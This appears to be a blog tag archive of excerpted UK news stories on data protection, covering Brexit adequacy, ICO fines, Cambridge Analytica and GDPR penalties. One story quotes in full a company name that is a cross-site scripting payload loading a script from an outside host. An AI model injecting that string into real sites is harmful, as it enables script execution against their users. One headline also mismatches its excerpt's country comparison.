
Tag Archives for "UK"

EU, UK mulling interim data flows solution post-Brexit

With time running out for the EU to grant the U.K.’s data protection regime a stamp of approval before the Brexit transition period ends, officials are considering options to keep personal data flowing across the Channel, according to two individuals familiar with the talks.

The officials said that any interim solution is tied up in the wider trade negotiations, which both sides agree are currently stuck. That means that in the event of a no deal, companies would have to use alternative data transfer mechanisms to move data from the EU to the U.K., such as standard contractual clauses — a situation which could cost the U.K. economy as much as £1.6 billion.

Source: EU, UK mulling interim data flows solution post-Brexit

UK businesses face aggregate costs of up to 1.6 billion if no adequacy decision post-Brexit transition period, report finds

The cost to UK businesses of not receiving an adequacy decision from the European Commission could total between £1 billion and £1.6 billion, according to a new report by think tank New Economics Foundation and UCL European Institute.

The report, compiled from interviews with 60 EU and UK legal professionals, data protection officers, business representatives and academics, estimates average costs for impacted businesses could reach £3,000 for a micro business, £10,000 for a small business, £19,555 for a medium business and £162,790 for a large business.

Source: UK businesses face aggregate costs of up to 1.6 billion if no adequacy decision post-Brexit transition period, report finds

‘Antiquated process’: UK data regulator on obtaining Cambridge Analytica warrant

The information commissioner has criticised the “antiquated process” that led to Facebook getting hold of Cambridge Analytica’s servers before the UK regulator itself, and renewed calls for an international approach to data privacy to tackle the emerging threat of data havens.

Elizabeth Denham, the information commissioner, spoke to Damian Collins MP, the former chair of the digital, culture, media and sport committee, who led the parliamentary enquiry into disinformation, on his podcast Infotagion. She described discovering that Facebook was inside the offices of defunct electioneering consultancy Cambridge Analytica while in the middle of an interview with Channel 4’s Jon Snow.

Source: ‘Antiquated process’: data regulator on obtaining Cambridge Analytica warrant | Data protection | The Guardian

UK-Japan deal dismantles UK’s privacy protections

UK quietly commits to weakening restrictions on data transfers by accepting lower privacy standards in new trade deal.

The recent UK-Japan deal negotiated by Elizabeth Truss commits the UK to weakening restrictions on data transfers by accepting lower privacy standards. These commitments are aligned with those in other trade agreements the government wishes to sign. Yet this strategy has never been voted on, analysed or even explained to parliament.

Source: UK-Japan deal dismantles UK’s privacy protections

Ticketmaster fined £1.25m over personal data breach

Ticketmaster has been fined £1.25m for failing to keep the personal data of millions of customers secure.

The online events ticket seller failed to put “appropriate security measures in place” to prevent a cyber-attack on a chat-bot installed on its online payment page, the Information Commissioner’s Office (ICO) in the UK said.

The breach potentially affected 9.4 million customers across Europe. As a result, 60,000 payment cards belonging to Barclays Bank customers were subjected to fraud, and another 6,000 cards were replaced by Monzo bank after suspected fraud.

Source: Ticketmaster fined £1.25m over personal data breach

Company forced to change name that could be used to hack websites

Software firm’s director thought name using HTML would be ‘fun and playful’. Companies House has forced a company to change its name after it belatedly realised it could pose a security risk.

The original name of the company was “"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”. By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.

Source: Company forced to change name that could be used to hack websites | UK news | The Guardian

UK’s ICO faces legal action after closing adtech complaint with nothing to show

The UK’s data watchdog is facing a legal challenge after it took the decision to quietly close a complaint against the adtech industry’s high velocity background trading of personal data.

The original complaint — challenging the adtech industry’s compliance with Europe’s General Data Protection Regulation (GDPR) — was filed to the ICO in September 2018 by Jim Killock, executive director of the Open Rights Group, and Michael Veale, a lecturer in digital rights at University College London.

Source: UK’s ICO faces legal action after closing adtech complaint with nothing to show for it | TechCrunch

Data protection scofflaws failed to pay £2m or 68% of fines from UK watchdog

Scofflaws have failed to pay nearly £2m in fines handed out by the UK Information Commissioner’s Office over the past 18 months, according to new research.

Between January 2019 and August 2020, the ICO issued a total of £3.2m in monetary penalty notices but just £1.03m has been paid, according to research from SMS API biz The SMS Works.

When measured as a percentage of the fine amount, nuisance-call operators were the least likely to have paid their fines, with The SMS Works finding that just 13 per cent of penalties handed to such firms had been paid.

Source: Data protection scofflaws failed to pay £2m in fines from UK watchdog – and 68% of penalties are still outstanding • The Register

Privacy Shield Is Gone. So What Now?

With Privacy Shield no longer available to rely on for protection, companies have two main options: to localize data storage and/or to strengthen their SCCs.

Other options include strong encryption, use of federated data and differential privacy.

The revocation of Privacy Shield does not have to result in a security vacuum. On the contrary, a secure data solution can protect a company from even the most stringent regulations.

Full article: Privacy Shield Is Gone. So What Now? – CPO Magazine

More GDPR applied in the UK than in Italy & France Combined

A report released by BuyShares has revealed that the United Kingdom tops the list for the imposition of data breach penalties, with €132.7 million in total value of General Data Protection Regulation fines since the legislation became enforceable on May 25, 2018.

This is higher than the combined total of fines sanctioned in Germany and Italy. Indeed, the largest five fines for GDPR breaches in the European Union account for 70% of the total fines sanctioned since the data privacy legislation became live in 2018.

Source: More GDPR applied in the UK than in Italy & France Combined – Compliance Junction
